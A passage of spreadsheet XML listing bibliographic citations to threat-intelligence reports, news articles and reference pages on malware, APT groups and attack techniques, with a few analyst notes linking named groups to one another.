  </si>
  <si>
    <t>Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.</t>
  </si>
  <si>
    <t>Santos, D. (2021, April 13). Threat Assessment: Clop Ransomware. Retrieved July 30, 2021.</t>
  </si>
  <si>
    <t>Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved July 22, 2020.</t>
  </si>
  <si>
    <t>Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can be (ab)used by malicious actors. Retrieved October 3, 2020.</t>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.</t>
  </si>
  <si>
    <t>Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.</t>
  </si>
  <si>
    <t>Falcone, R., Wilhoit, K.. (2018, November 16). Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Lancaster, T., Idrizovic, E. (2017, June 27). Paranoid PlugX. Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.</t>
  </si>
  <si>
    <t>Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.</t>
  </si>
  <si>
    <t>Tennis, M. (2020, December 17). SUPERNOVA: A Novel .NET Webshell. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Renals, P., Conant, S. (2016). SILVERTERRIER: The Next Evolution in Nigerian Cybercrime. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.</t>
  </si>
  <si>
    <t>Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command &amp; Control Understanding, Denying and Detecting. Retrieved April 20, 2016.</t>
  </si>
  <si>
    <t>Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021.</t>
  </si>
  <si>
    <t>Mohanta, A. (2020, November 25). Warzone RAT comes with UAC bypass technique. Retrieved April 7, 2022.</t>
  </si>
  <si>
    <t>Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>.NET Team. (2020, March 11). Visual Basic support planned for .NET 5.0. Retrieved June 23, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.</t>
  </si>
  <si>
    <t>Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020.</t>
  </si>
  <si>
    <t>VMRAY. (2021, January 14). Malware Analysis Spotlight: OSAMiner Uses Run-Only AppleScripts to Evade Detection. Retrieved October 4, 2022.</t>
  </si>
  <si>
    <t>Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018.</t>
  </si>
  <si>
    <t>Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020.</t>
  </si>
  <si>
    <t>Villeneuve, N., Sancho, D. (2011). THE “LURID” DOWNLOADER. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.</t>
  </si>
  <si>
    <t>Kim, J. et al. (2019, October). KIMSUKY GROUP: TRACKING THE KING OF THE SPEAR PHISHING. Retrieved November 2, 2020.</t>
  </si>
  <si>
    <t>VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.</t>
  </si>
  <si>
    <t>Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.</t>
  </si>
  <si>
    <t>Visa. (2015, March). Visa Security Alert: "RawPOS" Malware Targeting Lodging Merchants. Retrieved October 6, 2017.</t>
  </si>
  <si>
    <t>Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.</t>
  </si>
  <si>
    <t>Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.</t>
  </si>
  <si>
    <t>Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.</t>
  </si>
  <si>
    <t>Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.</t>
  </si>
  <si>
    <t>Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.</t>
  </si>
  <si>
    <t>Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.</t>
  </si>
  <si>
    <t>Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.</t>
  </si>
  <si>
    <t>Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.</t>
  </si>
  <si>
    <t>Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.</t>
  </si>
  <si>
    <t>Kanthak, S.. (2016, July 20). Vulnerability and Exploit Detector. Retrieved February 3, 2017.</t>
  </si>
  <si>
    <t>NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019.</t>
  </si>
  <si>
    <t>Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping — Advanced Maldoc Techniques. Retrieved September 17, 2020.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.</t>
  </si>
  <si>
    <t>Dwoskin, E. and Adam, K. (2017, May 14). More than 150 countries affected by massive cyberattack, Europol says. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug)</t>
  </si>
  <si>
    <t>Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). wevtutil. Retrieved September 14, 2021.</t>
  </si>
  <si>
    <t>White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.</t>
  </si>
  <si>
    <t>The term WhiteBear is used both for the activity group (a subset of G0010) as well as the malware observed. Based on similarities in behavior and C2, WhiteBear is assessed to be the same as S0168. (Citation: Securelist WhiteBear Aug 2017)(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>Wikibooks. (2018, August 19). Grsecurity/The RBAC System. Retrieved June 4, 2020.</t>
  </si>
  <si>
    <t>Wikipedia. (2018, March 30). IEEE 802.1X. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Wikipedia. (2018, March 10). Active Directory. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.</t>
  </si>
  <si>
    <t>Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (n.d.). Booting. Retrieved November 13, 2019.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.</t>
  </si>
  <si>
    <t>Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.</t>
  </si>
  <si>
    <t>Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, February 28). HTTP Public Key Pinning. Retrieved March 31, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (2016, January 26). ifconfig. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved January 10, 2018.</t>
  </si>
  <si>
    <t>Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.</t>
  </si>
  <si>
    <t>Wikipedia. (n.d.). Password cracking. Retrieved December 23, 2015.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.</t>
  </si>
  <si>
    <t>Wikipedia. (2017, January 31). Microsoft Windows library files. Retrieved February 13, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.</t>
  </si>
  <si>
    <t>Wikipedia. (2007, August 9). pwdump. Retrieved June 22, 2016.</t>
  </si>
  <si>
    <t>verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it &amp; How to Block . Retrieved August 10, 2020.</t>
  </si>
  <si>
    <t>A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.</t>
  </si>
  <si>
    <t>Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2017, April 19). Network access: Do not allow anonymous enumeration of SAM accounts and shares. Retrieved May 20, 2020.</t>
  </si>
  <si>
    <t>Global Research &amp; Analysis Team, Kaspersky Lab (GReAT). (2018, August 23). Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware. Retrieved September 27, 2022.</t>
  </si>
  <si>
    <t>Cowan, C. (2017, March 23). Strengthening the Microsoft Edge Sandbox. Retrieved March 12, 2018.</t>
  </si>
  <si>
    <t>Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.</t>
  </si>
  <si>
    <t>Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.</t>
  </si>
  <si>
    <t>Viviano, A. (2021, August 17). Getting started with Windows drivers: User mode and kernel mode. Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>Lucian Constantin. (2014, January 23). Windows malware tries to infect Android devices connected to PCs. Retrieved May 25, 2022.</t>
  </si>
  <si>
    <t>Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.</t>
  </si>
  <si>
    <t>Windows OS Hub. (2021, November 10). How to Allow Multiple RDP Sessions in Windows 10 and 11?. Retrieved March 28, 2022.</t>
  </si>
  <si>
    <t>absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.</t>
  </si>
  <si>
    <t>odzhan. (2019, May 25). Windows Process Injection: KernelCallbackTable used by FinFisher / FinSpy. Retrieved February 4, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Configure Timeout and Reconnection Settings for Remote Desktop Services Sessions. Retrieved December 11, 2017.</t>
  </si>
  <si>
    <t>Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021.</t>
  </si>
  <si>
    <t>HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.</t>
  </si>
  <si>
    <t>Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.</t>
  </si>
  <si>
    <t>Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>Skalkotos, N. (2013, September 20). WinExe. Retrieved January 22, 2018.</t>
  </si>
  <si>
    <t>Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.</t>
  </si>
  <si>
    <t>Greenberg, A. (2019, March 25). A Guide to LockerGoga, the Ransomware Crippling Industrial Firms. Retrieved July 17, 2019.</t>
  </si>
  <si>
    <t>Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Zetter, K. (2019, October 3). Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>Andy Greenberg. (2017, January 21). Hack Brief: Uber Paid Off Hackers to Hide a 57-Million User Data Breach. Retrieved May 14, 2021.</t>
  </si>
  <si>
    <t>DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege Elevation using the Powershell Profile. Retrieved July 8, 2019.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.</t>
  </si>
  <si>
    <t>Robert Falcone. (2017, February 14). XAgentOSX: Sofacy's Xagent macOS Tool. Retrieved July 12, 2017.</t>
  </si>
  <si>
    <t>Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019.</t>
  </si>
  <si>
    <t>Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.</t>
  </si>
  <si>
    <t>Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.</t>
  </si>
  <si>
    <t>Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant's network. Retrieved January 20, 2021.</t>
  </si>
  <si>
    <t>Desai, D.. (2015, August 14). Chinese cyber espionage APT group leveraging recently leaked Hacking Team exploits to target a Financial Services Firm. Retrieved January 26, 2016.</t>
  </si>
  <si>
    <t>Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022.</t>
  </si>
  <si>
    <t>Felici, M. (2006, December 6). Any application-defined hook procedure on my machine?. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.</t>
  </si>
  <si>
    <t>Cimpanu, C. (2020, September 30). North Korea has tried to hack 11 officials of the UN Security Council. Retrieved November 4, 2020.</t>
  </si>
  <si>
    <t>Cimpanu, C. (2018, September 13). Sly malware author hides cryptomining botnet behind ever-shifting proxy service. Retrieved September 15, 2020.</t>
  </si>
  <si>
    <t>madler. (2017). zlib. Retrieved February 20, 2020.</t>
  </si>
  <si>
    <t>Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Sadique, M. and Singh, A. (2020, September 29). Spear Phishing Campaign Delivers Buer and Bazar Malware. Retrieved November 19, 2020.</t>
  </si>
  <si>
    <t>Yadav, A., et al. (2017, August 31). Cobian RAT – A backdoored RAT. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021.</t>
  </si>
  <si>
    <t>Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>Shivtarkar, N. and Kumar, A. (2022, June 9). Lyceum .NET DNS Backdoor. Retrieved June 23, 2022.</t>
  </si>
  <si>
    <t>bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING &amp; LOADING TECHNIQUES. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Acunetix. (n.d.). Web Server Security and Database Server Security. Retrieved July 26, 2018.</t>
  </si>
  <si>
    <t>Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.</t>
  </si>
  <si>
    <t>CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022.</t>
  </si>
  <si>
    <t>PETER EWANE. (2017, June 9). MacSpy: OS X RAT as a Service. Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.</t>
  </si>
  <si>
    <t>Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Anomali Threat Research. (2019, October 15). Illicit Cryptomining Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Apple Inc. (2013, April 23). Bonjour Overview. Retrieved October 11, 2021.</t>
  </si>
  <si>
    <t>Steven Sande. (2013, December 23). AppleScript and Automator gain new features in OS X Mavericks. Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>valsmith. (2012, September 21). More on APTSim. Retrieved September 28, 2017.</t>
  </si>
  <si>
    <t>archlinux. (2020, August 11). systemd/Timers. Retrieved October 12, 2020.</t>
  </si>
  <si>
    <t>Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.</t>
  </si>
  <si>
    <t>Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.</t>
  </si>
  <si>
    <t>STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.</t>
  </si>
  <si>
    <t>Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020.</t>
  </si>
  <si>
    <t>Kaspersky Global Research &amp; Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.</t>
  </si>
  <si>
    <t>Benjamin Cane. (2013, September 16). Understanding a little more about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.</t>
  </si>
  <si>
    <t>Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.</t>
  </si>
  <si>
    <t>Fehrman, B. (2017, April 13). How to Bypass Web-Proxy Filtering. Retrieved September 20, 2019.</t>
  </si>
  <si>
    <t>Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.</t>
  </si>
  <si>
    <t>Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.</t>
  </si>
  <si>
    <t>CISA. (2022, April 28). Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine. Retrieved July 29, 2022.</t>
  </si>
  <si>
    <t>Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.</t>
  </si>
  <si>
    <t>Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. Retrieved January 11, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2021, October 28). Create symbolic links. Retrieved April 27, 2022.</t>
  </si>
  <si>
    <t>Apple. (2016, September 9). Creating XPC Services. Retrieved April 19, 2022.</t>
  </si>
  <si>
    <t>Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October 18, 2022.</t>
  </si>
  <si>
    <t>Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.</t>
  </si>
  <si>
    <t>Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.</t>
  </si>
  <si>
    <t>Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2006, August 31).  DHCP Server Operational Events. Retrieved March 7, 2022.</t>
  </si>
  <si>
    <t>U.S. Department of Homeland Security. (2016, August 30). The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. Retrieved July 29, 2022.</t>
  </si>
  <si>
    <t>Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021.</t>
  </si>
  <si>
    <t>Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021.</t>
  </si>
  <si>
    <t>Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.</t>
  </si>
  <si>
    <t>eSentire. (2021, July 21). Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels’ Owner, Brown-Forman Inc.. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.</t>
  </si>
  <si>
    <t>Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.</t>
  </si>
  <si>
    <t>Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.</t>
  </si>
  <si>
    <t>Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.</t>
  </si>
  <si>
    <t>Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.</t>
  </si>
  <si>
    <t>ESET. (2012, January 1). OSX/Flashback. Retrieved April 19, 2022.</t>
  </si>
  <si>
    <t>Yates, M. (2017, June 18). APT3 Uncovered: The code evolution of Pirpi. Retrieved September 28, 2017.</t>
  </si>
  <si>
    <t>svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.</t>
  </si>
  <si>
    <t>ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.</t>
  </si>
  <si>
    <t>Brod. (2013, July 15). Signed Mac Malware Using Right-to-Left Override Trick. Retrieved July 17, 2017.</t>
  </si>
  <si>
    <t>Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022.</t>
  </si>
  <si>
    <t>FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.</t>
  </si>
  <si>
    <t>Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.</t>
  </si>
  <si>
    <t>hasherezade. (2017, December 18). Process Doppelgänging – a new way to impersonate a process. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>hasherezade. (2021, June 30). Module 3 - Understanding and countering malware's evasion and self-defence. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Teusink, N. (2009, August 25). Passwords stored using reversible encryption: how it works (part 1). Retrieved November 17, 2021.</t>
  </si>
  <si>
    <t>Teusink, N. (2009, August 26). Passwords stored using reversible encryption: how it works (part 2). Retrieved November 17, 2021.</t>
  </si>
  <si>
    <t>RISKIQ. (2022, March 15). RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure. Retrieved July 29, 2022.</t>
  </si>
  <si>
    <t>Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.</t>
  </si>
  <si>
    <t>Zack Whittaker. (2019, August 12). This hacker’s iPhone charging cable can hijack your computer. Retrieved May 25, 2022.</t>
  </si>
  <si>
    <t>Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.</t>
  </si>
  <si>
    <t>Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.</t>
  </si>
  <si>
    <t>Ignacio Sanmillan. (2018, February 7). Executable and Linkable Format 101. Part 2: Symbols. Retrieved September 29, 2022.</t>
  </si>
  <si>
    <t>Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.</t>
  </si>
  <si>
    <t>Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>Mantvydas Baranauskas. (2019, November 16). Dumping and Cracking mscash - Cached Domain Credentials. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.</t>
  </si>
  <si>
